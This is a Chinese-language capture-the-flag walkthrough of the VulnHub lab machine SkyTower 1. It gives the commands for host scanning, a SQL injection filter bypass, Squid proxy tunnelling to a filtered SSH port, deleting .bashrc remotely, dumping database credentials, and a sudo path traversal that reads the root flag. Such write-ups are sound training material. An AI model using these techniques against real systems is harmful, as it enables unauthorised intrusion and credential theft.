OSCP难度靶机之SkyTower 1

admin 2022年5月9日19:35:01评论98 views字数 1026阅读3分25秒阅读模式

虚拟机信息

虚拟机下载地址:

https://www.vulnhub.com/entry/skytower-1,96/

虚拟机简介:您将需要跨越系统和应用程序漏洞的不同方面的技能,以及对各种服务以及如何攻击它们的理解

目标:1个flag

级别:中级

1、主机探测

1、通过netdiscover检测主机IP地址

arp-scan 192.168.1.0/24

OSCP难度靶机之SkyTower 1

2、服务探测

1、通过nmap进行端口扫描

nmap -A -sS -sV -v -p- 10.10.10.100

查看开放80和3128端口

OSCP难度靶机之SkyTower 1

3、渗透测试

3.1 WEB渗透

1.访问站点进行测试

OSCP难度靶机之SkyTower 1

2.SQL注入验证

在login登录框中输入单引号,会产生报错

OSCP难度靶机之SkyTower 1

3.过滤参数输入

通过测试使用如下参数可以绕过系统过滤

' || 1=1#

绕过过滤后,会提示SSH服务的用户名和密码

OSCP难度靶机之SkyTower 1

4.创建隧道

由于测试发现22端口已经被过滤,可以通过squid进行反向代理

proxytunnel -p 192.168.1.6:3128 -d 127.0.0.1:22 -a 2222

OSCP难度靶机之SkyTower 1

5.连接SSH服务

ssh [email protected] -p 2222

通过SSH可以连接,但是连接成功后会自动断开

OSCP难度靶机之SkyTower 1

6.测试环境变量

可能是由于 .bashrc 文件中指定的命令导致连接后直接断开

scp -P 2222 [email protected]:/home/john/.bashrc ./

OSCP难度靶机之SkyTower 1

OSCP难度靶机之SkyTower 1

7.远程删除环境变量文件

ssh -t [email protected] -p 2222 'rm .bashrc'

OSCP难度靶机之SkyTower 1

8.远程连接

 ssh [email protected] -p 2222

成功连接到主机

OSCP难度靶机之SkyTower 1

3.2 系统渗透

1.查看数据库信息

cd /var/www/
cat login.php

查看数据库用户名root,密码为root

OSCP难度靶机之SkyTower 1

2.进入数据库查看信息

mysql -uroot -proot
show databases;

OSCP难度靶机之SkyTower 1

3.查看数据表信息

use SkyTech;
select * from login;

OSCP难度靶机之SkyTower 1

4.查看本地用户密码

cat /etc/passwd

OSCP难度靶机之SkyTower 1

5.尝试切换账号

尝试发现william账号密码错误,sara账号禁止登录

OSCP难度靶机之SkyTower 1

6.删除sara账号下的文件

ssh -t [email protected] -p 2222 'rm .bashrc'

OSCP难度靶机之SkyTower 1

ssh [email protected] -p 2222

成功登录账号

OSCP难度靶机之SkyTower 1

7.通过文件滥用读取文件

sudo /bin/cat /accounts/../root/flag.txt

OSCP难度靶机之SkyTower 1

8.切换成root账号

su - root

OSCP难度靶机之SkyTower 1

原文始发于微信公众号(安全孺子牛):OSCP难度靶机之SkyTower 1

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2022年5月9日19:35:01
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   OSCP难度靶机之SkyTower 1http://cn-sec.com/archives/991628.html

发表评论

匿名网友 填写信息